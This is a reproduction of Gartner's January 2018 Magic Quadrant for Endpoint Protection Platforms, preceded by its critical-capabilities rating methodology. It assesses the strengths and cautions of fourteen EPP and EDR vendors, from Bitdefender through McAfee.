This methodology requires analysts to identify the critical capabilities for a class of products or services. Each capability is then weighted in terms of its relative importance for specific product or service use cases. Next, products/services are rated in terms of how well they achieve each of the critical capabilities. A score that summarizes how well they meet the critical capabilities for each use case is then calculated for each product/service.
“Critical capabilities” are attributes that differentiate products/services in a class in terms of their quality and performance. Gartner recommends that users consider the set of critical capabilities as some of the most important criteria for acquisition decisions.
In defining the product/service category for evaluation, the analyst first identifies the leading uses for the products/services in this market. What needs are end-users looking to fulfill, when considering products/services in this market? Use cases should match common client deployment scenarios. These distinct client scenarios define the Use Cases.
The analyst then identifies the critical capabilities. These capabilities are generalized groups of features commonly required by this class of products/services. Each capability is assigned a level of importance in fulfilling that particular need; some sets of features are more important than others, depending on the use case being evaluated.
Each vendor’s product or service is evaluated in terms of how well it delivers each capability, on a five-point scale. These ratings are displayed side-by-side for all vendors, allowing easy comparisons between the different sets of features.
Ratings and summary scores range from 1.0 to 5.0:
1 = Poor or Absent: most or all defined requirements for a capability are not achieved
2 = Fair: some requirements are not achieved
3 = Good: meets requirements
4 = Excellent: meets or exceeds some requirements
5 = Outstanding: significantly exceeds requirements
To determine an overall score for each product in the use cases, the product ratings are multiplied by the weightings to come up with the product score in use cases.
The critical capabilities Gartner has selected do not represent all capabilities for any product; therefore, may not represent those most important for a specific use situation or business objective. Clients should use a critical capabilities analysis as one of several sources of input about a product before making a product/service decision.

Magic Quadrant for Endpoint Protection Platforms

Magic Quadrant for Endpoint Protection Platforms

Published 24 January 2018 – ID G00325704 – 64 min read


Endpoint protection is evolving to address more of Gartner’s adaptive security architecture tasks such as hardening, investigation, incident detection, and incident response. Security and risk management leaders should ensure that their EPP vendor evolves fast enough to keep up with modern threats.

Strategic Planning Assumption

By 2021, endpoint protection platforms (EPPs) will provide automated, orchestrated incident investigation and breach response. Separate, stand-alone endpoint detection and response (EDR) solutions will focus on managed security service provider (MSSP) and large enterprise security operations center (SOC) environments.

Market Definition/Description

In September 2017, in response to changing market dynamics and client requirements, we adjusted our definition of an EPP. An EPP is a solution deployed on endpoint devices to prevent file-based malware, to detect and block malicious activity from trusted and untrusted applications, and to provide the investigation and remediation capabilities needed to dynamically respond to security incidents and alerts. (see  “Redefining Endpoint Protection for 2017 and 2018”). 
Organizations are placing a premium on protection and detection capabilities within an EPP, and are depreciating the EPP vendors’ ability to provide data protection capabilities such as data loss prevention, encryption or server controls. Security buyers are increasingly looking to the built-in security capabilities of their OS vendors, and most organizations are adopting disk encryption at the OS level with BitLocker in Microsoft Windows 10, and FileVault in Apple macOS.
Concurrently, protection for servers has diverged from EPP, with specialized tools to address the modern hybrid data center (cloud and on-premises; see  “Market Guide for Cloud Workload Protection Platforms”). Gartner recommends that organizations separate the purchasing decisions for server workloads from any product or strategy decisions involving endpoint protection. The evolutionary shift from hardware servers to VMs, containers and private/public cloud infrastructure means that server workloads now have different security requirements compared to end-user focused, interactive endpoints (see  “Endpoint and Server Security: Common Goals, Divergent Solutions”). 
This is a transformative period for the EPP market, and as the market has changed, so has the analysis profile used for this research. In the 2017 Magic Quadrant for Endpoint Protection Platforms, capabilities traditionally found in the EDR market (see  “Market Guide for Endpoint Detection and Response Solutions”) were considered as “nice to have” features. In this 2018 research, some of these features are now core components of an EPP that can address and respond to modern threats. 

Magic Quadrant

Figure 1. Magic Quadrant for Endpoint Protection Platforms

Source: Gartner (January 2018)

Magic Quadrant for Endpoint Protection Platforms

Vendor Strengths and Cautions

Bitdefender

Bitdefender provides good effectiveness across a broad range of platforms and capabilities. Bitdefender offers EPP and EDR in one platform, and one agent across endpoints, and physical, virtual or cloud servers.
While a large part of the installed base is in the consumer segment, the gap between enterprise and consumer business is narrowing. Bitdefender is a good choice for organizations that value malware detection accuracy and performance, as well as full support for data center and cloud workloads from a single solution provider. Bitdefender is also a partner for Microsoft’s Defender Advanced Threat Protection (ATP) platform, providing agents for Linux and macOS.
The vendor continues to round out its endpoint features for larger enterprises, and its brand awareness is low, impacting its execution. Bitdefender’s cloud-based, single-agent approach; large installed base; and recently released EDR module keep it relevant in this space.
Strengths
  • Bitdefender’s detection technology is well-regarded and performs well in third-party tests. The vendor has a long list of technology and service providers that use its detection capabilities as OEMs.
  • Bitdefender is noted by clients for ease of use, deployment and customer support, and in particular for its vision of single agent and single console (released in November 2017), providing a fully integrated EPP and EDR solution.
  • Patch management capabilities provide detailed information from the Common Vulnerability and Exposure (CVE) repository, and event severity, helping IT operations to prioritize updates and understand risks.
  • Bitdefender has partnered with Microsoft to provide protection to macOS and Linux systems in a Microsoft Windows Defender EPP environment, and will integrate with the Windows Defender ATP platform.
Cautions
  • While the macOS agent does benefit from machine learning (ML)-based detection instead of the normal substandard signature-based detection typically used for macOS, it does not report EDR data, leaving a visibility gap for most organizations.
  • The Bitdefender EPP agent lacks basic investigation capabilities like real-time indicator of compromise (IOC) searching.
  • There are no options for orchestration or automation with security operations, analytics and reporting (SOAR) tools.
  • While Bitdefender has invested in growing its enterprise sales operations, mind share remains low with larger enterprises, thereby limiting shortlist opportunities and apparent viability to larger clients.

Carbon Black

Carbon Black is in the middle of a significant corporate transition, consolidating its overall offerings into a new cloud-based security platform called Predictive Security Cloud. The company’s overall offerings consist of Cb Defense (EPP), Cb Response (threat hunting and incident response), and Cb Protection (application whitelisting and device lockdown). Carbon Black began to consolidate EDR features from Cb Response into Cb Defense in 2017 as it started to build a presence in the EPP market.
Carbon Black has earned a strong reputation as offering one of the leading EDR solutions in the marketplace. Cb Response (threat hunting) is typically found in more complex environments with very mature security operations teams. The Cb Defense agent collects and sends all the unfiltered endpoint data to the cloud using a proprietary data streaming mechanism that eliminates bursting and peaks on networks.
The majority of Carbon Black clients make tactical purchases, usually a one-year subscription with options to renew at the end of the term.
Carbon Black is in the Visionaries quadrant this year, but Cb Defense is still unproven, which impacts its execution. The vendor has a poor record of participation in public, independent malware accuracy and effectiveness testing, which impacts its vision and execution in this assessment.
Strengths
  • Carbon Black provides an advanced toolset that has broad appeal with organizations that have mature security operations teams consisting of high-caliber and very experienced personnel.
  • Carbon Black’s Cb Defense solution incorporates a blended approach consisting of signatures, ML, software behavior monitoring, process isolation and memory protection, along with exploit prevention.
  • Carbon Black’s updated and streamlined console offers advanced administrators simplified views of threats via visual alerts and triage, resulting in faster detection and response.
  • Carbon Black’s rich set of APIs and broad third-party partner ecosystem provide opportunities for mature SOCs to integrate Carbon Black findings into a diverse set of analysis, workflow and case management solutions.
Cautions
  • Clients that have not yet moved to Carbon Black’s cloud-based EPP and EDR product (Cb Defense) continue to report that they are struggling with the operational complexity of their Carbon Black deployments.
  • Some advanced prevention features such as cloud detonation and hash look-ups require online access to the Carbon Black cloud infrastructure, reducing the effectiveness for devices without a permanent connection to the internet.
  • Carbon Black has not yet integrated its threat hunting module from Cb Response or its application whitelisting capabilities from Cb Protection into its cloud-based platform, so customers that require those features will need separate agents and separate management consoles.
  • Carbon Black continues to be at the premium end of cost per endpoint in terms of cost to acquire and cost to operate, especially if organizations require the EPP and the separate application whitelisting capabilities provided by Cb Protection.
  • Carbon Black has continued to favor private or sponsored malware accuracy and effectiveness tests of its product and has had a poor record of consistent participation in public tests in 2017. Consequently, it is difficult to determine its efficacy versus peers.

Cisco

Cisco’s Advanced Malware Protection (AMP) for Endpoints is a new entrant to this year’s Magic Quadrant. It consists of prevent, detect and respond capabilities deployed as a cloud-managed solution that can be hosted in a public or private cloud.
Cisco’s AMP for Endpoints leverages similar technology to the AMP capabilities on other Cisco devices. Its AMP Cloud technology detects known threats, and uses threat intelligence data from Threat Grid and Talos security researchers for exploit prevention.
Gartner clients rarely shortlist AMP for Endpoints for its technology, usually because they get a strong financial incentive when purchasing other Cisco products. Although a component of AMP for Endpoints is present in VirusTotal’s public interface, it did not participate in public endpoint-focused third-party testing in 2017, which impacts its execution and vision in this assessment.
Cisco’s AMP solution has the most appeal for existing Cisco clients that leverage other Cisco security solutions and aspire to establish security operations around Cisco products.
Strengths
  • The main strength of Cisco AMP is in threat intelligence and exploit prevention as a means of reducing the attack footprint available for compromise.
  • The Cisco AMP agent for Windows and macOS both collect process and usage data, providing EDR coverage and visibility for the most popular devices in enterprises.
  • Cisco offers a broad range of managed services, including SOCs, managed detection and response, active threat hunting, and incident support.
  • Reporting integration and data sharing between AMP and other Cisco security offerings, such as network, firewall, NGIPS, routers, email gateway and web proxies, are improving.
Cautions
  • Cisco is, first and foremost, a network security and hardware vendor, and originally exited the endpoint protection market in 2010 when it discontinued the Cisco Security Agent (CSA) product before gaining the AMP technology through the acquisition of Sourcefire.
  • Advanced malware protection requires access to the Cisco AMP Cloud to perform advanced analysis.
  • While the data provided across the dashboard is relatively comprehensive, the workflow requires multiple clicks to multiple screens to get a full understanding of the state of an endpoint or the issues being caused by malicious software.
  • The Cisco workflow provides limited role-based access, and limited case management capabilities.
  • Cisco’s AMP solution is part of a “better together” product ecosystem. Organizations that do not leverage other Cisco security solutions will realize fewer of the integration benefits, such as intelligence sharing and automated blocking of new threats at all control points.
  • Cisco AMP has not been tested widely in public, independent tests to determine its efficacy versus peers.

Comodo

The Comodo brand is best-known as a digital certificate authority and, in late October, Francisco Partners acquired a majority stake in Comodo’s certificate authority business, with Comodo planning to focus on its endpoint protection strategy.
Comodo Advanced Endpoint Protection (AEP) includes malware protection, a host-based intrusion prevention system (IPS), web filtering, a personal firewall, sandbox analysis, vulnerability analysis and patching, and a 100% classification capability that helps guarantee a good or bad verdict on all executable files. When an executable is untrusted or unknown, it is run in a tightly controlled container to isolate any potentially malicious activity.
Comodo also sells small or midsize business (SMB)-focused web gateways, web application firewalls and mobile device management. Its security products are managed from a central web-based portal that manages service request ticketing and workflow.
Strengths
  • Comodo AEP is best-known for its default deny approach, where unknown applications and executables are wrapped in secure, isolated containers, and known bad applications are blocked.
  • Comodo is showing sales strength and technical scalability as it starts making progress with a handful of global companies with more than 100,000 seats.
  • Comodo provides managed endpoint protection, detection, response and remediation services through integration with the cloud-based IT and Security Manager, and its patch, device, and asset management capabilities.
  • Comodo’s Valkyrie file verdict system is focused on file analysis, and its cloud-based threat intelligence and analysis platform benefits from intelligence gathered from Comodo customers, honeypots, crawlers and partners.
  • Gartner clients report that AEP is easy to deploy and use, and that Comodo implementation support is very responsive. Support for end-of-life OSs, (e.g., Windows 2003) is good as well.
Cautions
  • The solution depends on its autocontainment capability to prevent attacks, and detection is limited to known indicators of compromise (IOCs).
  • Gartner clients report that the Linux product is lacking in functionality, with ineffective detection and no central management or monitoring capabilities.
  • According to Gartner clients, it takes too much time to tune the AEP engine to accept custom applications. This is a common scenario with application control.
  • Comodo’s new EDR product, cWatch EDR, is available for free, but has not been proven by organizations using EDR for advanced threat hunting and self-driven threat analysis. Event recording is limited, and detection is mainly based on IOC and indicators of attack (IOA) scanning.
  • cWatch EDR lacks automated remediation and incident response, but some of these capabilities are included in Comodo AEP itself.

CrowdStrike

CrowdStrike made strong progress in 2017 and managed to replace incumbent legacy EPP vendors at large organizations. With 79% of its business in North America, CrowdStrike has deployments in 176 countries and includes some very large organizations with more than 50,000 seats.
CrowdStrike Falcon’s lightweight single agent supports all environments (physical, virtual and cloud) and functions with the same agent and management console for Falcon Prevent protection and Falcon Insight EDR. With its EDR heritage, CrowdStrike records most endpoint events and sends all recorded data to its cloud for analysis and detection. Some prevention is done locally on the agent.
Alongside EPP and EDR capabilities, CrowdStrike offers a complementary service called Falcon OverWatch, at an attractive price point, leading to extremely high adoption among its installed base. Falcon OverWatch provides managed threat hunting, alerting, response and investigation assistance.
Organizations with small or no SOC teams will find the combination of Falcon OverWatch and Falcon Endpoint Protection compelling. CrowdStrike also offers a well-respected breach response service.
Strengths
  • Gartner clients report simple and easy Falcon deployments, in part due to the cloud architecture.
  • Ninety-eight percent of Falcon customers use CrowdStrike’s Falcon OverWatch managed detection and response service, which provides varying levels of service to suit varying customer requirements. If appropriate, CrowdStrike can manage Falcon deployments, incident response and remote remediation services, which is especially attractive to smaller organizations.
  • Falcon uses a range of detection and prevention tools centered around behavioral analytics that essentially implement a “deny malicious behavior” policy. Falcon analytics enable very specific response capabilities, depending on the severity of malicious behavior.
  • CrowdStrike’s cloud-based architecture provides an extensible platform that enables additional security services like IT hygiene, vulnerability assessment and threat intelligence. Its EDR and EPP functionalities are well-integrated.
  • CrowdStrike’s Falcon Insight EDR agent provides parity across Windows, macOS, and Linux systems, providing a solid visibility base for most organizations.
Cautions
  • CrowdStrike does not have an integrated deployment solution, but it does work well with third-party tools.
  • The full product is more expensive than other EPP solutions, but includes the OverWatch service, and covers the costs of cloud data storage for EDR.
  • CrowdStrike Falcon’s offline protection is greatly enhanced when connected to the cloud-based Falcon platform, so is not suitable for air-gapped networks.
  • Like most other EDR platforms, Falcon’s EDR functionality requires skilled technical staff to use, which is why CrowdStrike’s OverWatch service is so popular with customers.
  • Customers report that CrowdStrike’s roadmap is not proactively communicated in a timely manner.

Cylance

Cylance was one of the pioneers in using machine learning to detect file-based malware, but by 2017, most EPP competitors claimed to have added ML capabilities, pressuring Cylance to more aggressively address non-file-based attacks. In late May 2017, Cylance formally launched its EDR product, CylanceOPTICS, which was late to market compared to other vendors, and generally perceived to be lacking in advanced capabilities already available in key competing products.
Eighty-five percent of Cylance’s business is in North America, although the company has about 3,700 customers across the globe, half of which represent organizations with fewer than 500 seats.
CylancePROTECT is cloud-based, with Cylance hosting and managing the console infrastructure directly. The vendor finally started participating in the VirusTotal community in 2017, but has a poor third-party test participation record when compared with established EPP vendors.
Strengths
  • Cylance has a strong OEM business, with over half of its licensed seats sold through its OEM relationships, including Dell. It also launched an MSSP partner program in 2017 and onboarded 70 new MSSPs.
  • Aside from Windows, Cylance supports macOS, Linux and virtual environments.
  • Gartner clients report a good experience, effective customer support, and effective malware and ransomware protection.
  • CylancePROTECT has a small footprint and easy-to-use management console, with low maintenance support requirements.
  • CylancePROTECT runs effectively in offline mode and doesn’t require a connection to the internet to remain effective.
Cautions
  • Administrative functions in Cylance’s management console need to be more fully developed, according to Gartner clients, in order to more easily manage several features, such as device and script control.
  • The aggressive ML capabilities prove very good at detecting new versions of known malware. As with any ML-based technology, however, it can be gamed by malware authors, and Gartner clients report that it can have a high false-positive rate. The lack of cloud-based look-ups hampers the vendor’s ability to quickly resolve false positives, leaving the customer to manage the exclusion of false positives themselves, until the vendor is able to push out a client-side rule update (which it calls Centroids), before ultimately updating the ML model.
  • CylancePROTECT and CylanceOPTICS require two separate agents with two separate installations.
  • EDR functionality does not enable automated rollback. The UI and data captured in CylanceOPTICS is not robust enough for advanced threat hunting. Its InstaQuery only provides information from devices that are online.
  • Cylance lacks adjacent security applications, such as inventory of installed applications, IT hygiene assessments and vulnerability assessments, but does benefit from API integrations with some SOAR and security information and event management (SIEM) providers.
  • Custom applications, or applications that have not been analyzed by Cylance, may generate false positives, thereby requiring organizations to establish a whitelisting process when they release new builds of the custom application. As previously noted, once the false positive has been analyzed, Cylance’s Centroid technology will push out a new client-side rule update to mitigate the false positives until they are included in the next ML model.

Endgame

Endgame is a new entrant to the Magic Quadrant this year. It is a privately held organization that has evolved from pure EDR for large enterprise and defense organizations, with the addition of prevention capabilities for the broader enterprise market.
Endgame is one of the few vendors in this analysis that sells a single product offering — meaning there are no additional add-ons or purchases — to address protection, detection and response use cases.
Although the platform is missing a number of traditional EPP-related features, like application control or suspicious file quarantining, Endgame scores well in protection capabilities by focusing on the tools, techniques and procedures used by adversaries, rather than simply looking for bad files.
Endgame’s big differentiator is in its investigation and threat hunting capabilities, where natural-language understanding (NLU) queries, such as “Search for PowerShell” and “Find NetTraveler,” allow organizations to make use of advanced detection capabilities without the need for deep experience.
Endgame is a good EPP shortlist candidate for organizations with an existing or emerging SOC where incident investigation and response is a key requirement.
Strengths
  • The platform scales to very large deployments, and still performs fast, real-time investigation actions.
  • It lowers the barrier to entry for advanced capabilities like threat hunting, allowing less experienced security staff to begin, and often complete, investigation work.
  • Endgame has been evaluated against the Mitre ATT&CK matrix, which evaluates where in the kill-chain the product’s capabilities are designed to prevent attacks.
  • Endgame’s platform can function in a fully offline mode, with no internet required.
  • The agent utilizes hardware assistance (called HA-CFI), detecting in-memory exploit attempts by looking for abnormal behavior in the CPU register. However, this detection technology is not available when Endgame is deployed in a virtual environment, reducing the effectiveness to only DBI-based detection on those devices.
Cautions
  • No application control capabilities are provided in the agent.
  • Despite deploying an agent to every endpoint, there is no vulnerability reporting, which leaves a disconnect and creates additional work for both IT operations and security.
  • Files cannot be temporarily quarantined, and are deleted if they are deemed malicious; however, false positives can be recovered and restored from the management console as samples are collected for further analysis.
  • There is currently no macOS agent for protection or EDR, leaving a gap in visibility for most organizations.

ESET

ESET has a strong EPP market share among SMBs to large enterprises, providing solid protection with a lightweight agent. But it still manages to provide a large protection stack, including a host-based intrusion prevention system (HIPS), ML, exploit prevention, detection of in-memory attacks and ransomware behavior detection.
ESET recently launched an additional platform for EDR capabilities, called Enterprise Inspector. Customers with experienced security staff will be able to inspect and modify the detection rules within Enterprise Inspector, and further tailor them to their unique requirements.
ESET has significant security community mind share through published research, disruption of organized crime and its WeLiveSecurity website. The vendor’s completeness of vision is impacted in this assessment by its limited cloud management capabilities, and the relative lateness of its EDR capabilities.
ESET has localized support in 35 languages, which means it is an attractive choice for globally distributed organizations. Its protection capabilities make it a solid shortlist candidate for any organization.
Strengths
  • Despite the low overhead from its lightweight client, ESET’s anti-malware engine remains a consistently solid performer in test results, with a strong protection stack.
  • ESET has a comprehensive set of capabilities that incorporate operational IT into the protection and detection stack.
  • Managed EDR features delivering threat hunting and attack detection were recently made available to customers.
  • Customers can take advantage of free implementation services in some countries, reducing the burden of migrating from another vendor.
Cautions
  • Cloud-based management options are limited to Microsoft Azure or Amazon Web Services (AWS) instances, rather than a true SaaS platform. These instances can be customer self-managed, managed by a managed service provider partner or managed by ESET for North American customers.
  • Although ESET’s endpoint agent implements exploit prevention and in-memory scanning for attacks, there is no vulnerability discovery or reporting capability. These capabilities are supplied through ESET’s partner ecosystem.
  • ESET does not include application whitelisting or system lock-down capabilities in its endpoint agent; instead, applications and executables are blacklisted by file hash or through HIPS control policies.
  • The ESET macOS agent does not support real-time IOC search and does not integrate with EDR, leaving a visibility gap for many organizations.
  • The role-based administration within ESET Enterprise Inspector only allows two user modes (administrator and end user), meaning larger organizations with defined escalation paths may find implementation challenging, due to the lack of case and incident management workflow within Enterprise Inspector.

FireEye

FireEye, a new entrant to this Magic Quadrant, is a security suite vendor that provides email, web, network, endpoint security and threat intelligence, which are managed in the new Helix security operations platform launched in April 2017.
FireEye revenue from its HX Series endpoint security product is a relatively small portion of the vendor’s overall business. The HX management console is deployed through the cloud or as a virtual or on-premises hardware appliance that supports up to 100,000 endpoints. FireEye’s HX endpoint security agent is installed on 9 million endpoints globally, with over 70% of customers in North America and 15% in EMEA. FireEye’s appeal to Gartner clients is as a security suite and not as a best-of-breed endpoint security vendor.
FireEye Endpoint Security 4.0 shipped in late September 2017; therefore, market response to FireEye’s endpoint protection capabilities was limited during this research period. FireEye met the inclusion criteria by participating in its only public third-party test in late 2017, which impacts both vision and execution in this assessment.
Strengths
  • In 2017, FireEye HX added support for macOS and Linux hosts, cloud and hybrid management; bolstered prevention via an OEM signature-based AV component; and increased behavior analysis and exploit prevention.
  • HX customers that use Helix have 30 days of endpoint data stored in the cloud by default, and this can be configured for up to one year’s worth.
  • HX benefits from threat intelligence from Mandiant’s breach investigation team and iSIGHT Threat Intelligence service, as well as from FireEye products’ shared threat indicators.
  • FireEye offers a global managed detection and response service, FireEye as a Service, to help clients that are short on resources.
Cautions
  • Most of the EDR data is stored on the endpoint, with a subset stored on the HX server and, if enabled, in the cloud with FireEye Helix. Incident responders may not be able to perform a full root cause analysis involving compromised endpoints that are offline, or, as in the case of ransomware, have had their data encrypted.
  • A few Gartner clients report that HX produces high false-positive rates when the product is first implemented.
  • FireEye’s cloud-based management offering was new in 2017, and uptake was small at the time of this research.
  • Manual remediation capabilities are restricted to endpoint containment, and there is no support for automated configuration rollbacks or file restoration.
  • At the time of this research, FireEye HX has not been tested widely in public, independent tests to determine its efficacy versus peers.

Fortinet

Fortinet is a network security suite vendor that sells enterprise firewalls, email security, sandbox, web application firewalls and a few other products, including its FortiClient endpoint security software. The vendor is a new entrant to this Magic Quadrant. FortiClient is not well-known to most Gartner clients inquiring about endpoint security, and we see little adoption of it outside of Fortinet’s client base. FortiClient is becoming more focused on the enterprise space, but its current installed base is mostly in the SMB space, and about half of its customers have less than 1,000 seats installed.
In 2017, FortiClient generated less than 1% of the vendor’s revenue. Its track record of endpoint-focused third-party testing is poor, and this impacts its execution and vision in this assessment.
Strengths
  • The FortiClient EPP agent has four customizable modules that include components designed to work in conjunction with Fortinet products, including FortiGate (firewall), FortiSandbox, FortiMail, FortiWeb and others. It can be a good choice if an organization wants to consolidate its solutions with a network security suite vendor, rather than take a best-of-breed approach.
  • FortiClient is easy to deploy and easy to manage.
  • Patch management is part of the FortiClient application, which also benefits from FortiGuard Labs global threat intelligence and native integration with its sandbox.
  • FortiClient quarantines objects and kills processes in real-time using client-side analysis and, if present, based on the FortiSandbox verdict.
  • Fortinet’s FortiGate firewall is a Leader in Gartner’s Magic Quadrant for Enterprise Network Firewalls, enabling the vendor to leverage its good reputation to sell its FortiClient EPP application.
Cautions
  • Along with the lack of independent, third-party testing to validate the accuracy and effectiveness, Gartner clients report that FortiClient needs to improve on the malware protection it affords.
  • The management console needs to be more customizable, according to Gartner clients.
  • FortiClient, together with FortiSandbox, only provide partial EDR coverage. Full EDR recording is not provided.
  • Although FortiClient includes a signatureless anti-exploit engine, the primary malware protection engine is based on rules and signatures. As such, it has more difficulty detecting unknown malicious operations and malware and zero-day attacks without the other components of Fortinet’s Advanced Threat Protection solution.
  • As a successful network security suite vendor, Fortinet is likely to continue focusing its R&D efforts on the interactions and interdependencies of its various suite modules. Without a focus on the EPP market, FortiClient is likely to be slow to develop into a complete and self-contained endpoint protection solution.

F-Secure

In 2017, F-Secure continued with its long track record for high-accuracy, lightweight and low-impact anti-malware detection with its cloud-based F-Secure Protection Service for Business (PSB) offering and on-premises solution F-Secure Business Suite. F-Secure added an integrated password manager with password protection capabilities and improved device control management to PSB and Business Suite. F-Secure also added ML capabilities to its Rapid Detection Service, which is its managed EDR solution.
Over the past 12 months, F-Secure further enhanced its product deployment and management capabilities, making it a good choice for larger, more complex enterprises.
F-Secure is focusing its investments in its managed service offerings, and has added product enhancements with a specific focus on preventing ransomware attacks.
Strengths
  • F-Secure is unique in that it works with a very rapid iteration, agile development process, with a release update every two weeks. This small update approach allows it to automate much of the agent update process, and adapt rapidly to new threats and attack techniques.
  • F-Secure has consistently good malware test results and performance tests. It includes cloud-based file intelligence look-ups and a virtual sandbox for malicious behavior detection.
  • DataGuard, a new ransomware protection capability, provides advanced protection of sensitive local and network folders by preventing modification, tampering or encrypting from unauthorized applications and users.
  • Patch management capabilities are integrated in the endpoint client (on-premises and cloud) and offer automation capabilities via the management console to keep endpoints up to date. This reduces the complexities associated with traditional distinct patching processes.
  • Clients report that F-Secure’s Rapid Detection Service provides strong security specialist review, analysis and response capabilities.
  • Clients report that the F-Secure EPP solution is easy to deploy and maintain.
Cautions
  • F-Secure’s EDR offering is still evolving, and is primarily designed as a managed service called Rapid Detection Service. Organizations looking for a hands-on investigation tool will notice missing features in the current version that are found in competitive offerings, such as global process and application inventory.
  • While sales are strong in Northern Europe and the Asia/Pacific region and Japan, global organizations should review their local vendor coverage and support options to ensure that F-Secure or their chosen reseller will be able to adequately service the needs of their account.
  • F-Secure has a healthy focus on malware detection effectiveness, but it has not delivered some common protection and detection techniques available in most competitive solutions. There is no application control, application whitelisting or network-based malware sandboxing capability. This reduces the appeal of F-Secure to organizations looking for a broad baseline of protection capabilities.
  • Despite a strong brand name, the majority of F-Secure clients are sub-5,000 seats, and it is unclear how well the cloud management and investigation platform scales for larger organizations.

Kaspersky Lab

Kaspersky Lab’s “built not bought” approach has provided good integration and allows for a strong approach to managed services. The vendor is late to market with EDR capabilities, and has no vendor-managed, SaaS-type cloud-based management options for organizations with more than 1,000 endpoints to manage.
The vendor’s research team makes up one-third of the organization, and is well-known for its accurate malware detection and in-depth investigation and analysis of many sophisticated attacks.
Kaspersky Lab has been the subject of media scrutiny, citing unnamed intelligence sources, claiming that Kaspersky’s software was being used by the Russian government to access sensitive information.
While the U.S. government has issued a ban on the use of Kaspersky software by government agencies, the U.S. government has not given any evidence that Kaspersky software has been used by the Russian government to gain sensitive information. It has also not demonstrated that Kaspersky software is more vulnerable (technical or otherwise) than any other vendors’ antivirus software. Kaspersky filed an appeal in U.S. federal court in late 2017, asking that the government ban be overturned.
From a technology and malware prevention perspective, Kaspersky Lab remains a good candidate as a solution for any organization that is not constrained by U.S. government recommendations. Despite the media stories surrounding Kaspersky Lab, it continues to grow its endpoint presence globally.
Strengths
  • Kaspersky Lab is a consistent top performer in public, third-party AV tests.
  • The Kaspersky agent and management console provides detailed vulnerability reporting and prioritization, and the ability to automate the deployment of patches.
  • A semiautomated IOC search within the new EDR capabilities can take advantage of open IOC format files, making initial threat assessments fast and repeatable.
  • Kaspersky Managed Protection and Targeted Attack Discovery are fully managed threat detection services that will be attractive to organizations without a dedicated SOC.
  • Kaspersky R&D continues to publish more public reports on sophisticated attacks and threat actor investigations than any other vendor.
Cautions
  • Gartner clients report that the management console, Kaspersky Security Center, can appear complex and overwhelming, especially when compared to the fluid, user-centric design of newer EPP and EDR vendor management consoles.
  • The mainstream EDR capabilities were introduced into the Kaspersky Anti Targeted Attack Platform in late 2017, one of the last vendors to begin adding these features.
  • The EDR investigation lacks step-by-step, guided investigations for less experienced organizations, but Kaspersky Lab can provide training on using its products for advanced topics like digital forensics, malware analysis and incident response.
  • The Kaspersky Endpoint Security Cloud — a cloud-based management solution — is currently available only for SMB customers. Larger organizations looking for cloud-based management must deploy and maintain the management server in AWS or Azure.

Malwarebytes

Malwarebytes continues to gain momentum, using its experience as the incident response tool of choice by organizations of all sizes, and has doubled its seat count in the past 12 months.
In 2017, Malwarebytes delivered cloud-based management, and added mainstream and advanced EDR capabilities to its single agent, which includes the breach remediation tools for remediating infections. It is one of the few vendors in this space that can roll back the changes made by ransomware, including restoring files that were encrypted in the attack. This ransomware remediation can be performed remotely from the cloud management console up to 72 hours after the attack, without the need for any local access to an endpoint.
For organizations with small IT or security teams, Malwarebytes provides strong protection capabilities and some advanced EDR capabilities, all at an attractive price point. For larger organizations, or organizations with a mature security team, there are some missing enterprise features that make it a challenge to incorporate into an existing SOC workflow.
Strengths
  • The new EDR module included in Malwarebytes’ cloud-based platform provides advanced investigation capabilities that are rarely seen outside of a dedicated EDR tool. For example, the Active Response shell provides remote access to interact with processes, view and modify the registry, send and receive files, and run commands and scripts remotely.
  • Ransomware rollback can be initiated remotely, including file recovery.
  • Malwarebytes offers application hardening and exploit mitigation, anomaly detection, ML, and behavior monitoring and blocking.
  • With the exception of EDR and investigation, Malwarebytes does not require an internet connection to provide threat protection. Organizations with untethered endpoints and no network connectivity will, therefore, continue to have the full protection.
  • The Malwarebytes endpoint agent can be orchestrated by workflows and triggers in enterprise-scale platforms such as IBM BigFix, Tanium, Phantom, ForeScout and SCCM.
Cautions
  • The cloud-based management is lacking in visual reporting and quick-view dashboards. Customers report that the workflow for finding and responding to alerts is inefficient.
  • Although the endpoint agent implements strong protection against exploits, there is no vulnerability discovery or reporting capabilities within the Malwarebytes administration console.
  • There are no role-based access controls or directory-based access controls available for the management console. Larger organizations may find the lack of case and incident management workflow a challenge.
  • The Malwarebytes macOS agent does not report EDR data, leaving a visibility gap for most organizations.

McAfee

Intel completed the sale of 51% McAfee to TPG in April 2017 and, as a stand-alone company, McAfee hopes it can now refocus its efforts on the core aspect of its business: endpoint protection.
McAfee remains one of the top three incumbent EPP vendors by market share, and its execution issues over the past three years make it the top competitive target for displacement by other vendors in the EPP Magic Quadrant. Specifically, Endpoint Security (ENS) version 10.x (v.10.x) upgrades remained a very challenging adoption cycle for most McAfee clients. While the feature set and protection capabilities included in the most recent release are quite compelling, and public test scores have improved over the past year, McAfee’s execution assessment is hampered by organizations continuing to be hesitant to adopt the latest version, leaving them vulnerable to commodity malware as well as more advanced threats. Gartner client inquiry data identified McAfee as the single most-quoted EPP vendor that clients were planning to replace. Customer satisfaction scores were low again for 2017.
McAfee’s ePolicy Orchestrator (ePO) continues to be the most quoted reason for clients initially adopting McAfee solutions in their environment, or for retaining McAfee over their contract terms and subsequent renewals. However, disenchantment with the EPP product is quickly eroding the perceived value of ePO, in favor of vendors with cloud-based EPP management.
Strengths
  • McAfee’s investment in developing an EDR solution has resulted in an offering with a useful feature set.
  • ePO provides a common administrative platform for all of McAfee’s offerings and integrates with over 130 third-party applications. McAfee also offers a cloud-based ePO.
  • Available in McAfee’s advanced endpoint suites, Dynamic Application Containment (DAC) provides behavior-based containment/isolation of untrusted applications using McAfee Global Threat Intelligence data.
  • McAfee has the optional Threat Intelligence Exchange (TIE) and Data Exchange Layer (DXL) to share local object reputation information across both network and endpoint products. TIE is also part of the new common endpoint framework.
Cautions
  • Although adoption of ENS v.10.x versions has seen significant acceleration over the past year, a large number of McAfee’s clients remain on v.8.8, resulting in client questions about McAfee’s resellers’ and system integrators’ commitment to the upgrade, and the viability and effectiveness of the platform overall.
  • The vendor reports that most McAfee customers are actively engaged with ENS, but many Gartner clients still running v.8.8 were still not aware that they are entitled to move to a newer version, despite having renewed their contract within the last 12 to 24 months.
  • Although McAfee was among the first of the traditional EPP vendors to provide EDR capabilities, it remains in the early stages of customer adoption when compared to other vendors.
  • The most common customer complaints continue to be with the effectiveness of the older multiple-agent architecture in v.8.8, and its impact on deployment complexity and performance. Client inquiries reveal that many clients are not actively planning a migration process to the updated platform, and are looking for alternative vendors.
